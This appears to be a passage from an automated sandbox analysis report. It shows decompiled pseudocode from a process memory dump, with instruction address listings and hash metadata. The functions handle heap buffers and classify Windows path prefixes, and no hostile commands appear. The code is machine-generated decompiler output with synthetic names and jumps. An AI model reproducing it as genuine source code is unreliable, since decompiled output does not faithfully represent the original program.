                                                              														__eflags = _t380;
                                                              														if(_t380 != 0) {
                                                              															_t173 = _t380 + 4;
                                                              															 *_t173 =  *(_t380 + 4) | 1;
                                                              															__eflags =  *_t173;
                                                              														}
                                                              														_t454 = _t524;
                                                              														 *(_t528 - 0x80) = _t454;
                                                              														_t327 = 1;
                                                              														__eflags = 1;
                                                              													}
                                                              													__eflags =  *(_t528 - 0xd4);
                                                              													if( *(_t528 - 0xd4) == 0) {
                                                              														_t505 =  *(_t528 - 0x80);
                                                              													} else {
                                                              														_t505 = _t479 + _t427;
                                                              														_t523 = 0x10;
                                                              														 *_t505 = _t523;
                                                              														_t367 = 3;
                                                              														 *((short*)(_t505 + 2)) = _t367;
                                                              														_t368 = 4;
                                                              														 *((short*)(_t505 + 6)) = _t368;
                                                              														 *(_t505 + 4) = 0;
                                                              														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                              														_t327 = 1;
                                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                              														_t479 = _t479 + _t523;
                                                              														 *(_t528 - 0x78) = _t479;
                                                              														__eflags = _t454;
                                                              														if(_t454 != 0) {
                                                              															_t186 = _t454 + 4;
                                                              															 *_t186 =  *(_t454 + 4) | 1;
                                                              															__eflags =  *_t186;
                                                              														}
                                                              														 *(_t528 - 0x80) = _t505;
                                                              													}
                                                              													__eflags =  *(_t528 - 0x7a) - _t327;
                                                              													if( *(_t528 - 0x7a) == _t327) {
                                                              														 *(_t528 - 0xd4) = _t479 + _t427;
                                                              														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                              														E04BDF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                              														_t529 = _t529 + 0xc;
                                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                              														_t479 =  *(_t528 - 0x78) + _t522;
                                                              														 *(_t528 - 0x78) = _t479;
                                                              														__eflags = _t505;
                                                              														if(_t505 != 0) {
                                                              															_t199 = _t505 + 4;
                                                              															 *_t199 =  *(_t505 + 4) | 1;
                                                              															__eflags =  *_t199;
                                                              														}
                                                              														_t505 =  *(_t528 - 0xd4);
                                                              														 *(_t528 - 0x80) = _t505;
                                                              													}
                                                              													__eflags =  *(_t528 - 0xa8);
                                                              													if( *(_t528 - 0xa8) != 0) {
                                                              														_t356 = _t479 + _t427;
                                                              														 *(_t528 - 0xd4) = _t356;
                                                              														_t462 =  *(_t528 - 0xac);
                                                              														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                              														_t485 = 0xc;
                                                              														 *((short*)(_t356 + 2)) = _t485;
                                                              														 *(_t356 + 6) = _t462;
                                                              														 *((short*)(_t356 + 4)) = 0;
                                                              														_t211 = _t356 + 8; // 0x9
                                                              														E04BDF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                              														E04BDFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                              														_t529 = _t529 + 0x18;
                                                              														_t427 =  *(_t528 - 0x88);
                                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                              														_t505 =  *(_t528 - 0xd4);
                                                              														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                              														 *(_t528 - 0x78) = _t479;
                                                              														_t362 =  *(_t528 - 0x80);
                                                              														__eflags = _t362;
                                                              														if(_t362 != 0) {
                                                              															_t222 = _t362 + 4;
                                                              															 *_t222 =  *(_t362 + 4) | 1;
                                                              															__eflags =  *_t222;
                                                              														}
                                                              													}
                                                              													__eflags =  *(_t528 - 0xb0);
                                                              													if( *(_t528 - 0xb0) != 0) {
                                                              														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                              														_t458 = 0xb;
                                                              														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                              														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                              														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                              														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                              														E04BDFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                              														_t529 = _t529 + 0xc;
                                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                              														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                              														 *(_t528 - 0x78) = _t479;
                                                              														__eflags = _t505;
                                                              														if(_t505 != 0) {
                                                              															_t241 = _t505 + 4;
                                                              															 *_t241 =  *(_t505 + 4) | 1;
                                                              															__eflags =  *_t241;
                                                              														}
                                                              													}
                                                              													_t328 =  *(_t528 + 0x1c);
                                                              													__eflags = _t328;
                                                              													if(_t328 == 0) {
                                                              														L87:
                                                              														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                              														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                              														_t455 =  *(_t528 - 0xdc);
                                                              														 *(_t427 + 0x14) = _t455;
                                                              														_t480 =  *(_t528 - 0xa0);
                                                              														_t517 = 3;
                                                              														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                              														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                              															asm("rdtsc");
                                                              															 *(_t427 + 0x3c) = _t480;
                                                              														} else {
                                                              															 *(_t427 + 0x3c) = _t455;
                                                              														}
                                                              														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                              														_t456 =  *[fs:0x18];
                                                              														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                              														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                              														_t427 = 0;
                                                              														__eflags = 0;
                                                              														_t511 = 0x18;
                                                              														goto L91;
                                                              													} else {
                                                              														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                              														__eflags = _t519;
                                                              														 *(_t528 - 0x8c) = _t328;
                                                              														do {
                                                              															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                              															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                              															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                              															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                              															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                              															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                              																_t334 =  *_t519;
                                                              															} else {
                                                              																_t334 = 0;
                                                              															}
                                                              															_t336 = _t334 & 0x000000ff;
                                                              															__eflags = _t336;
                                                              															_t427 =  *(_t528 - 0x88);
                                                              															if(_t336 == 0) {
                                                              																_t481 = _t479 + _t506;
                                                              																__eflags = _t481;
                                                              																 *(_t528 - 0x78) = _t481;
                                                              																E04BDF3E0(_t479 + _t427, _t457, _t506);
                                                              																_t529 = _t529 + 0xc;
                                                              															} else {
                                                              																_t340 = _t336 - 1;
                                                              																__eflags = _t340;
                                                              																if(_t340 == 0) {
                                                              																	E04BDF3E0( *(_t528 - 0xb8), _t457, _t506);
                                                              																	_t529 = _t529 + 0xc;
                                                              																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                              																} else {
                                                              																	__eflags = _t340 == 0;
                                                              																	if(_t340 == 0) {
                                                              																		__eflags = _t506 - 8;
                                                              																		if(_t506 == 8) {
                                                              																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                              																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                              																		}
                                                              																	}
                                                              																}
                                                              															}
                                                              															_t339 = 0x10;
                                                              															_t519 = _t519 + _t339;
                                                              															_t263 = _t528 - 0x8c;
                                                              															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                              															__eflags =  *_t263;
                                                              															_t479 =  *(_t528 - 0x78);
                                                              														} while ( *_t263 != 0);
                                                              														goto L87;
                                                              													}
                                                              												}
                                                              											} else {
                                                              												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                              												 *(_t528 - 0xa2) = _t392;
                                                              												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                              												__eflags = _t469;
                                                              												while(1) {
                                                              													 *(_t528 - 0xe4) = _t511;
                                                              													__eflags = _t392;
                                                              													_t393 = _t427;
                                                              													if(_t392 != 0) {
                                                              														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                              													}
                                                              													_t395 = (_t393 & 0x000000ff) - _t427;
                                                              													__eflags = _t395;
                                                              													if(_t395 == 0) {
                                                              														_t511 = _t511 +  *_t469;
                                                              														__eflags = _t511;
                                                              													} else {
                                                              														_t398 = _t395 - 1;
                                                              														__eflags = _t398;
                                                              														if(_t398 == 0) {
                                                              															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                              															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                              														} else {
                                                              															__eflags = _t398 == 1;
                                                              															if(_t398 == 1) {
                                                              																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                              																_t402 =  *_t469 & 0x0000ffff;
                                                              																 *(_t528 - 0xac) = _t402;
                                                              																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                              															}
                                                              														}
                                                              													}
                                                              													__eflags = _t511 -  *(_t528 - 0xe4);
                                                              													if(_t511 <  *(_t528 - 0xe4)) {
                                                              														break;
                                                              													}
                                                              													_t397 =  *(_t528 - 0x88) + 1;
                                                              													 *(_t528 - 0x88) = _t397;
                                                              													_t469 = _t469 + 0x10;
                                                              													__eflags = _t397 -  *(_t528 + 0x1c);
                                                              													_t392 =  *(_t528 - 0xa2);
                                                              													if(_t397 <  *(_t528 + 0x1c)) {
                                                              														continue;
                                                              													}
                                                              													goto L45;
                                                              												}
                                                              												_t475 = 0x216;
                                                              												 *(_t528 - 0x74) = 0x216;
                                                              												goto L45;
                                                              											}
                                                              										} else {
                                                              											asm("lock dec dword [eax+ecx*8+0x4]");
                                                              											goto L16;
                                                              										}
                                                              									}
                                                              									_t491 = E04C64CAB(_t306, _t528 - 0xa4);
                                                              									 *(_t528 - 0x74) = _t491;
                                                              									__eflags = _t491;
                                                              									if(_t491 != 0) {
                                                              										goto L91;
                                                              									} else {
                                                              										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                              										goto L20;
                                                              									}
                                                              								}
                                                              								L16:
                                                              								 *(_t528 - 0x74) = 0x1069;
                                                              								L93:
                                                              								_t298 =  *(_t528 - 0xd0) + 1;
                                                              								 *(_t528 - 0xd0) = _t298;
                                                              								_t474 = _t474 + _t511;
                                                              								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                              								_t494 = 4;
                                                              								__eflags = _t298 - _t494;
                                                              								if(_t298 >= _t494) {
                                                              									goto L100;
                                                              								}
                                                              								_t494 =  *(_t528 - 0xcc);
                                                              								_t435 = _t298;
                                                              								continue;
                                                              							}
                                                              							__eflags = _t494[2] | _t494[3];
                                                              							if((_t494[2] | _t494[3]) == 0) {
                                                              								goto L15;
                                                              							}
                                                              							goto L12;
                                                              						}
                                                              						__eflags = _t301;
                                                              						if(_t301 != 0) {
                                                              							goto L92;
                                                              						}
                                                              						goto L10;
                                                              						L92:
                                                              						goto L93;
                                                              					}
                                                              				} else {
                                                              					_push(0x57);
                                                              					L101:
                                                              					return E04BED130(_t427, _t494, _t511);
                                                              				}
                                                              			}
                                                              0x04c660ba
                                                              0x04c660ba
                                                              0x04c660ba
                                                              0x04c660be
                                                              0x04c660c0
                                                              0x04c660c5
                                                              0x04c660c5
                                                              0x04c660c5
                                                              0x04c660c6
                                                              0x04c660cd
                                                              0x04c66114
                                                              0x04c660cf
                                                              0x04c660cf
                                                              0x04c660d4
                                                              0x04c660d5
                                                              0x04c660da
                                                              0x04c660db
                                                              0x04c660e1
                                                              0x04c660e2
                                                              0x04c660e8
                                                              0x04c660f8
                                                              0x04c660fd
                                                              0x04c660fe
                                                              0x04c66102
                                                              0x04c66104
                                                              0x04c66107
                                                              0x04c66109
                                                              0x04c6610b
                                                              0x04c6610b
                                                              0x04c6610b
                                                              0x04c6610b
                                                              0x04c6610f
                                                              0x04c6610f
                                                              0x04c66117
                                                              0x04c6611a
                                                              0x04c6611f
                                                              0x04c66125
                                                              0x04c66134
                                                              0x04c66139
                                                              0x04c6613f
                                                              0x04c66146
                                                              0x04c66148
                                                              0x04c6614b
                                                              0x04c6614d
                                                              0x04c6614f
                                                              0x04c6614f
                                                              0x04c6614f
                                                              0x04c6614f
                                                              0x04c66153
                                                              0x04c66159
                                                              0x04c66159
                                                              0x04c6615c
                                                              0x04c66163
                                                              0x04c66169
                                                              0x04c6616c
                                                              0x04c66172
                                                              0x04c66181
                                                              0x04c66186
                                                              0x04c66187
                                                              0x04c6618b
                                                              0x04c66191
                                                              0x04c66195
                                                              0x04c661a3
                                                              0x04c661bb
                                                              0x04c661c0
                                                              0x04c661c3
                                                              0x04c661cc
                                                              0x04c661d0
                                                              0x04c661dc
                                                              0x04c661de
                                                              0x04c661e1
                                                              0x04c661e4
                                                              0x04c661e6
                                                              0x04c661e8
                                                              0x04c661e8
                                                              0x04c661e8
                                                              0x04c661e8
                                                              0x04c661e6
                                                              0x04c661ec
                                                              0x04c661f3
                                                              0x04c66203
                                                              0x04c66209
                                                              0x04c6620a
                                                              0x04c66216
                                                              0x04c6621d
                                                              0x04c66227
                                                              0x04c66241
                                                              0x04c66246
                                                              0x04c6624c
                                                              0x04c66257
                                                              0x04c66259
                                                              0x04c6625c
                                                              0x04c6625e
                                                              0x04c66260
                                                              0x04c66260
                                                              0x04c66260
                                                              0x04c66260
                                                              0x04c6625e
                                                              0x04c66264
                                                              0x04c66267
                                                              0x04c66269
                                                              0x04c66315
                                                              0x04c66315
                                                              0x04c6631b
                                                              0x04c6631e
                                                              0x04c66324
                                                              0x04c66327
                                                              0x04c6632f
                                                              0x04c66330
                                                              0x04c66333
                                                              0x04c6633a
                                                              0x04c6633c
                                                              0x04c66335
                                                              0x04c66335
                                                              0x04c66335
                                                              0x04c6633f
                                                              0x04c66342
                                                              0x04c6634c
                                                              0x04c66352
                                                              0x04c66355
                                                              0x04c66355
                                                              0x04c66359
                                                              0x00000000
                                                              0x04c6626f
                                                              0x04c66275
                                                              0x04c66275
                                                              0x04c66278
                                                              0x04c6627e
                                                              0x04c6627e
                                                              0x04c66281
                                                              0x04c66287
                                                              0x04c6628d
                                                              0x04c66298
                                                              0x04c6629c
                                                              0x04c662a2
                                                              0x04c6629e
                                                              0x04c6629e
                                                              0x04c6629e
                                                              0x04c662a7
                                                              0x04c662a7
                                                              0x04c662aa
                                                              0x04c662b0
                                                              0x04c662f0
                                                              0x04c662f0
                                                              0x04c662f2
                                                              0x04c662f8
                                                              0x04c662fd
                                                              0x04c662b2
                                                              0x04c662b2
                                                              0x04c662b2
                                                              0x04c662b5
                                                              0x04c662dd
                                                              0x04c662e2
                                                              0x04c662e5
                                                              0x04c662b7
                                                              0x04c662b8
                                                              0x04c662bb
                                                              0x04c662bd
                                                              0x04c662c0
                                                              0x04c662c4
                                                              0x04c662cd
                                                              0x04c662cd
                                                              0x04c662c0
                                                              0x04c662bb
                                                              0x04c662b5
                                                              0x04c66302
                                                              0x04c66303
                                                              0x04c66305
                                                              0x04c66305
                                                              0x04c66305
                                                              0x04c6630c
                                                              0x04c6630c
                                                              0x00000000
                                                              0x04c6627e
                                                              0x04c66269
                                                              0x04c65eac
                                                              0x04c65ebb
                                                              0x04c65ebe
                                                              0x04c65ecb
                                                              0x04c65ecb
                                                              0x04c65ece
                                                              0x04c65ece
                                                              0x04c65ed4
                                                              0x04c65ed7
                                                              0x04c65ed9
                                                              0x04c65edb
                                                              0x04c65edb
                                                              0x04c65ee1
                                                              0x04c65ee1
                                                              0x04c65ee3
                                                              0x04c65f20
                                                              0x04c65f20
                                                              0x04c65ee5
                                                              0x04c65ee5
                                                              0x04c65ee5
                                                              0x04c65ee8
                                                              0x04c65f11
                                                              0x04c65f18
                                                              0x04c65eea
                                                              0x04c65eea
                                                              0x04c65eed
                                                              0x04c65ef2
                                                              0x04c65ef8
                                                              0x04c65efb
                                                              0x04c65f0a
                                                              0x04c65f0a
                                                              0x04c65eed
                                                              0x04c65ee8
                                                              0x04c65f22
                                                              0x04c65f28
                                                              0x00000000
                                                              0x00000000
                                                              0x04c65f30
                                                              0x04c65f31
                                                              0x04c65f37
                                                              0x04c65f3a
                                                              0x04c65f3d
                                                              0x04c65f44
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04c65f46
                                                              0x04c65f48
                                                              0x04c65f4d
                                                              0x00000000
                                                              0x04c65f4d
                                                              0x04c65dda
                                                              0x04c65ddf
                                                              0x00000000
                                                              0x04c65ddf
                                                              0x04c65dd8
                                                              0x04c65da7
                                                              0x04c65da9
                                                              0x04c65dac
                                                              0x04c65dae
                                                              0x00000000
                                                              0x04c65db4
                                                              0x04c65db4
                                                              0x00000000
                                                              0x04c65db4
                                                              0x04c65dae
                                                              0x04c65d88
                                                              0x04c65d8d
                                                              0x04c66363
                                                              0x04c66369
                                                              0x04c6636a
                                                              0x04c66370
                                                              0x04c66372
                                                              0x04c6637a
                                                              0x04c6637b
                                                              0x04c6637d
                                                              0x00000000
                                                              0x00000000
                                                              0x04c6637f
                                                              0x04c66385
                                                              0x00000000
                                                              0x04c66385
                                                              0x04c65d38
                                                              0x04c65d3b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04c65d3b
                                                              0x04c65d27
                                                              0x04c65d29
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04c66360
                                                              0x00000000
                                                              0x04c66360
                                                              0x04c65c10
                                                              0x04c65c10
                                                              0x04c663da
                                                              0x04c663e5
                                                              0x04c663e5

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2e8416c43d281640fd7f362523b8dc36f9397982c4369fa009e9517389fc1b2
                                                              • Instruction ID: 21944d6b2d8614e4f0f2f92b14579a45d6a83003ab58ea006cd66a04c68257a6
                                                              • Opcode Fuzzy Hash: d2e8416c43d281640fd7f362523b8dc36f9397982c4369fa009e9517389fc1b2
                                                              • Instruction Fuzzy Hash: 72423D75A00219DFDB24CF68C880BA9B7B2FF45304F15C1AAD94EEB241E775AA85CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 92%
                                                              			E04BB4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                              				signed int _v8;
                                                              				void* _v20;
                                                              				signed int _v24;
                                                              				char _v532;
                                                              				char _v540;
                                                              				signed short _v544;
                                                              				signed int _v548;
                                                              				signed short* _v552;
                                                              				signed short _v556;
                                                              				signed short* _v560;
                                                              				signed short* _v564;
                                                              				signed short* _v568;
                                                              				void* _v570;
                                                              				signed short* _v572;
                                                              				signed short _v576;
                                                              				signed int _v580;
                                                              				char _v581;
                                                              				void* _v584;
                                                              				unsigned int _v588;
                                                              				signed short* _v592;
                                                              				void* _v597;
                                                              				void* _v600;
                                                              				void* _v604;
                                                              				void* _v609;
                                                              				void* _v616;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				unsigned int _t161;
                                                              				signed int _t162;
                                                              				unsigned int _t163;
                                                              				void* _t169;
                                                              				signed short _t173;
                                                              				signed short _t177;
                                                              				signed short _t181;
                                                              				unsigned int _t182;
                                                              				signed int _t185;
                                                              				signed int _t213;
                                                              				signed int _t225;
                                                              				short _t233;
                                                              				signed char _t234;
                                                              				signed int _t242;
                                                              				signed int _t243;
                                                              				signed int _t244;
                                                              				signed int _t245;
                                                              				signed int _t250;
                                                              				void* _t251;
                                                              				signed short* _t254;
                                                              				void* _t255;
                                                              				signed int _t256;
                                                              				void* _t257;
                                                              				signed short* _t260;
                                                              				signed short _t265;
                                                              				signed short* _t269;
                                                              				signed short _t271;
                                                              				signed short** _t272;
                                                              				signed short* _t275;
                                                              				signed short _t282;
                                                              				signed short _t283;
                                                              				signed short _t290;
                                                              				signed short _t299;
                                                              				signed short _t307;
                                                              				signed int _t308;
                                                              				signed short _t311;
                                                              				signed short* _t315;
                                                              				signed short _t316;
                                                              				void* _t317;
                                                              				void* _t319;
                                                              				signed short* _t321;
                                                              				void* _t322;
                                                              				void* _t323;
                                                              				unsigned int _t324;
                                                              				signed int _t325;
                                                              				void* _t326;
                                                              				signed int _t327;
                                                              				signed int _t329;
                                                              
                                                              				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                              				_v8 =  *0x4c8d360 ^ _t329;
                                                              				_t157 = _a8;
                                                              				_t321 = _a4;
                                                              				_t315 = __edx;
                                                              				_v548 = __ecx;
                                                              				_t305 = _a20;
                                                              				_v560 = _a12;
                                                              				_t260 = _a16;
                                                              				_v564 = __edx;
                                                              				_v580 = _a8;
                                                              				_v572 = _t260;
                                                              				_v544 = _a20;
                                                              				if( *__edx <= 8) {
                                                              					L3:
                                                              					if(_t260 != 0) {
                                                              						 *_t260 = 0;
                                                              					}
                                                              					_t254 =  &_v532;
                                                              					_v588 = 0x208;
                                                              					if((_v548 & 0x00000001) != 0) {
                                                              						_v556 =  *_t315;
                                                              						_v552 = _t315[2];
                                                              						_t161 = E04BCF232( &_v556);
                                                              						_t316 = _v556;
                                                              						_v540 = _t161;
                                                              						goto L17;
                                                              					} else {
                                                              						_t306 = 0x208;
                                                              						_t298 = _t315;
                                                              						_t316 = E04BB6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                              						if(_t316 == 0) {
                                                              							L68:
                                                              							_t322 = 0xc0000033;
                                                              							goto L39;
                                                              						} else {
                                                              							while(_v581 == 0) {
                                                              								_t233 = _v588;
                                                              								if(_t316 > _t233) {
                                                              									_t234 = _v548;
                                                              									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                              										_t254 = L04BB4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                              										if(_t254 == 0) {
                                                              											_t169 = 0xc0000017;
                                                              										} else {
                                                              											_t298 = _v564;
                                                              											_v588 = _t316;
                                                              											_t306 = _t316;
                                                              											_t316 = E04BB6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                              											if(_t316 != 0) {
                                                              												continue;
                                                              											} else {
                                                              												goto L68;
                                                              											}
                                                              										}
                                                              									} else {
                                                              										goto L90;
                                                              									}
                                                              								} else {
                                                              									_v556 = _t316;
                                                              									 *((short*)(_t329 + 0x32)) = _t233;
                                                              									_v552 = _t254;
                                                              									if(_t316 < 2) {
                                                              										L11:
                                                              										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                              											_t161 = 5;
                                                              										} else {
                                                              											if(_t316 < 6) {
                                                              												L87:
                                                              												_t161 = 3;
                                                              											} else {
                                                              												_t242 = _t254[2] & 0x0000ffff;
                                                              												if(_t242 != 0x5c) {
                                                              													if(_t242 == 0x2f) {
                                                              														goto L16;
                                                              													} else {
                                                              														goto L87;
                                                              													}
                                                              													goto L101;
                                                              												} else {
                                                              													L16:
                                                              													_t161 = 2;
                                                              												}
                                                              											}
                                                              										}
                                                              									} else {
                                                              										_t243 =  *_t254 & 0x0000ffff;
                                                              										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                              											if(_t316 < 4) {
                                                              												L81:
                                                              												_t161 = 4;
                                                              												goto L17;
                                                              											} else {
                                                              												_t244 = _t254[1] & 0x0000ffff;
                                                              												if(_t244 != 0x5c) {
                                                              													if(_t244 == 0x2f) {
                                                              														goto L60;
                                                              													} else {
                                                              														goto L81;
                                                              													}
                                                              												} else {
                                                              													L60:
                                                              													if(_t316 < 6) {
                                                              														L83:
                                                              														_t161 = 1;
                                                              														goto L17;
                                                              													} else {
                                                              														_t245 = _t254[2] & 0x0000ffff;
                                                              														if(_t245 != 0x2e) {
                                                              															if(_t245 == 0x3f) {
                                                              																goto L62;
                                                              															} else {
                                                              																goto L83;
                                                              															}
                                                              														} else {
                                                              															L62:
                                                              															if(_t316 < 8) {
                                                              																L85:
                                                              																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                              																goto L17;
                                                              															} else {
                                                              																_t250 = _t254[3] & 0x0000ffff;
                                                              																if(_t250 != 0x5c) {
                                                              																	if(_t250 == 0x2f) {
                                                              																		goto L64;
                                                              																	} else {
                                                              																		goto L85;
                                                              																	}
                                                              																} else {
                                                              																	L64:
                                                              																	_t161 = 6;
                                                              																	goto L17;
                                                              																}
                                                              															}
                                                              														}
                                                              													}
                                                              												}
                                                              											}
                                                              											goto L101;
                                                              										} else {
                                                              											goto L11;
                                                              										}
                                                              									}
                                                              									L17:
                                                              									if(_t161 != 2) {
                                                              										_t162 = _t161 - 1;
                                                              										if(_t162 > 5) {
                                                              											goto L18;
                                                              										} else {
                                                              											switch( *((intOrPtr*)(_t162 * 4 +  &M04BB45F8))) {
                                                              												case 0:
                                                              													_v568 = 0x4b71078;
                                                              													__eax = 2;
                                                              													goto L20;
                                                              												case 1:
                                                              													goto L18;
                                                              												case 2:
                                                              													_t163 = 4;
                                                              													goto L19;
                                                              											}
                                                              										}
                                                              										goto L41;
                                                              									} else {
                                                              										L18:
                                                              										_t163 = 0;
                                                              										L19:
                                                              										_v568 = 0x4b711c4;
                                                              									}
                                                              									L20:
                                                              									_v588 = _t163;
                                                              									_v564 = _t163 + _t163;
                                                              									_t306 =  *_v568 & 0x0000ffff;
                                                              									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                              									_v576 = _t265;
                                                              									if(_t265 > 0xfffe) {
                                                              										L90:
                                                              										_t322 = 0xc0000106;
                                                              									} else {
                                                              										if(_t321 != 0) {
                                                              											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                              												if(_v580 != 0) {
                                                              													goto L23;
                                                              												} else {
                                                              													_t322 = 0xc0000106;
                                                              													goto L39;
                                                              												}
                                                              											} else {
                                                              												_t177 = _t306;
                                                              												goto L25;
                                                              											}
                                                              											goto L101;
                                                              										} else {
                                                              											if(_v580 == _t321) {
                                                              												_t322 = 0xc000000d;
                                                              											} else {
                                                              												L23:
                                                              												_t173 = L04BB4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                              												_t269 = _v592;
                                                              												_t269[2] = _t173;
                                                              												if(_t173 == 0) {
                                                              													_t322 = 0xc0000017;
                                                              												} else {
                                                              													_t316 = _v556;
                                                              													 *_t269 = 0;
                                                              													_t321 = _t269;
                                                              													_t269[1] = _v576;
                                                              													_t177 =  *_v568 & 0x0000ffff;
                                                              													L25:
                                                              													_v580 = _t177;
                                                              													if(_t177 == 0) {
                                                              														L29:
                                                              														_t307 =  *_t321 & 0x0000ffff;
                                                              													} else {
                                                              														_t290 =  *_t321 & 0x0000ffff;
                                                              														_v576 = _t290;
                                                              														_t310 = _t177 & 0x0000ffff;
                                                              														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                              															_t307 =  *_t321 & 0xffff;
                                                              														} else {
                                                              															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                              															E04BDF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                              															_t329 = _t329 + 0xc;
                                                              															_t311 = _v580;
                                                              															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                              															 *_t321 = _t225;
                                                              															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                              																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                              															}
                                                              															goto L29;
                                                              														}
                                                              													}
                                                              													_t271 = _v556 - _v588 + _v588;
                                                              													_v580 = _t307;
                                                              													_v576 = _t271;
                                                              													if(_t271 != 0) {
                                                              														_t308 = _t271 & 0x0000ffff;
                                                              														_v588 = _t308;
                                                              														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                              															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                              															E04BDF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                              															_t329 = _t329 + 0xc;
                                                              															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                              															 *_t321 = _t213;
                                                              															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                              																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                              															}
                                                              														}
                                                              													}
                                                              													_t272 = _v560;
                                                              													if(_t272 != 0) {
                                                              														 *_t272 = _t321;
                                                              													}
                                                              													_t306 = 0;
                                                              													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                              													_t275 = _v572;
                                                              													if(_t275 != 0) {
                                                              														_t306 =  *_t275;
                                                              														if(_t306 != 0) {
                                                              															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
